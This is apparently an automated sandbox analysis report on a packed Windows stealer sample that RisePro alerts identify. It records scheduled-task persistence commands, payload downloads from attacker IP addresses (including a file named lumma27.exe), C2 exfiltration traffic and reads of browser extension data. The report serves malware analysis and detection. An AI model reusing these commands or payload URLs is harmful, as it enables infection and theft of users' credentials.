Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 29, 2024, 7:43 a.m.	March 29, 2024, 7:45 a.m.

Size	5.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`9ffa99ae9f8ab00f8e944cb3317f1dd3`
SHA256	`2caec1ce51c8304261e5ac88333d805a13c5fa2b0ca1c0c19a7e5a9a2af78b43`
CRC32	`2E365765`
ssdeep	`98304:2QTLK3OmctIY4tTNEsxwyNJqSVCS+Nfl4gvqvU7dYblDQdKw7:I3AIYxvyrzVCVNN4bcJYbidKw`
Yara	PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) UPX_Zero - UPX packed file

getimage15.php "C:\Users\test22\AppData\Local\Temp\getimage15.php"
2548
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
  2804
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
  2864
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
  2928
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST
  2988
- nKr51DmJ1Ent7SAqXPmZ.exe "C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe"
  3056

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.186.192	34.117.186.192
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166

IP Address	Status	Action
104.26.4.15	Active	Moloch
164.124.101.2	Active	Moloch
193.233.132.197	Active	Moloch
34.117.186.192	Active	Moloch
5.42.65.117	Active	Moloch
5.42.66.22	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49163 -> 5.42.65.117:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 5.42.65.117:50500 -> 192.168.56.101:49163	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49164 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49164 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49164 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49163 -> 5.42.65.117:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 5.42.65.117:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 5.42.65.117:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49174 -> 5.42.66.22:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 5.42.66.22:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 193.233.132.197:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 193.233.132.197:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.197:80 -> 192.168.56.101:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.197:80 -> 192.168.56.101:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49166 104.26.4.15:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=db-ip.com	65:b1:27:2e:35:d2:f7:1f:20:04:c5:ca:ea:4e:7a:b4:69:6a:83:00

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameA March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 29, 2024, 7:43 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:43 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:43 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:43 a.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 29, 2024, 7:43 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 29, 2024, 7:43 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 29, 2024, 7:43 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 29, 2024, 7:43 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA March 29, 2024, 7:43 a.m.	buffer: System.MissingMethodException: ???? ?? ? ????. '!!0 System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(IntPtr)' ??: MSG_NET.Angelo.ReturnSpecialList() ??: MSG_NET.Angelo..ctor() ??: MSG_NET.Program.Main(String[] args) console_handle: 0x0000000b	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 29, 2024, 7:43 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.vmp\xc2\xa4\xc2\xbb

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	AFX_DIALOG_LAYOUT
resource name	None

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 29, 2024, 7:43 a.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x76fdf559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x76fdf639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x76f8df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd Start+0x8ed0f getimage15+0xf574f @ 0x122574f Start+0x8597e getimage15+0xec3be @ 0x121c3be Start+0x776ce getimage15+0xde10e @ 0x120e10e Start+0xa4ee2 getimage15+0x10b922 @ 0x123b922 Start+0x8a0a8 getimage15+0xf0ae8 @ 0x1220ae8 Start+0x8a35c getimage15+0xf0d9c @ 0x1220d9c Start+0x871aa getimage15+0xedbea @ 0x121dbea Start+0x870d6 getimage15+0xedb16 @ 0x121db16 Start+0x87298 getimage15+0xedcd8 @ 0x121dcd8 Start+0x873ff getimage15+0xede3f @ 0x121de3f Start+0x77a54 getimage15+0xde494 @ 0x120e494 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x76fde667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x76fde653 registers.esp: 4061260 registers.edi: 7493744 registers.eax: 4061276 registers.ebp: 4061380 registers.edx: 0 registers.ebx: 0 registers.esi: 7340032 registers.ecx: 2147483647	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 29, 2024, 7:43 a.m.

stacktrace:

RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x76fdf559
RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x76fdf639
RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x76f8df95
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
Start+0x8ed0f getimage15+0xf574f @ 0x122574f
Start+0x8597e getimage15+0xec3be @ 0x121c3be
Start+0x776ce getimage15+0xde10e @ 0x120e10e
Start+0xa4ee2 getimage15+0x10b922 @ 0x123b922
Start+0x8a0a8 getimage15+0xf0ae8 @ 0x1220ae8
Start+0x8a35c getimage15+0xf0d9c @ 0x1220d9c
Start+0x871aa getimage15+0xedbea @ 0x121dbea
Start+0x870d6 getimage15+0xedb16 @ 0x121db16
Start+0x87298 getimage15+0xedcd8 @ 0x121dcd8
Start+0x873ff getimage15+0xede3f @ 0x121de3f
Start+0x77a54 getimage15+0xde494 @ 0x120e494
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff
exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653
exception.instruction: jmp 0x76fde667
exception.module: ntdll.dll
exception.exception_code: 0xc0000374
exception.offset: 845395
exception.address: 0x76fde653
registers.esp: 4061260
registers.edi: 7493744
registers.eax: 4061276
registers.ebp: 4061380
registers.edx: 0
registers.ebx: 0
registers.esi: 7340032
registers.ecx: 2147483647

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://5.42.66.22/crypted_de7109ba.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.66.22/crypted_de7109ba.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.233.132.197/lumma27.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.233.132.197/lumma27.exe

Performs some HTTP requests (5 events)

request	HEAD http://5.42.66.22/crypted_de7109ba.exe
request	GET http://5.42.66.22/crypted_de7109ba.exe
request	HEAD http://193.233.132.197/lumma27.exe
request	GET http://193.233.132.197/lumma27.exe
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152

Allocates read-write-execute memory (usually to unpack itself) (19 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72161000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72162000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00601000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00467000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:43 a.m.	process_identifier: 3056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 29, 2024, 7:43 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (50 out of 2813 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\igkpcodhieompeloncfnbekccinhapdb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Sync Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT

Foreign language identified in PE resource (50 out of 80 events)

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

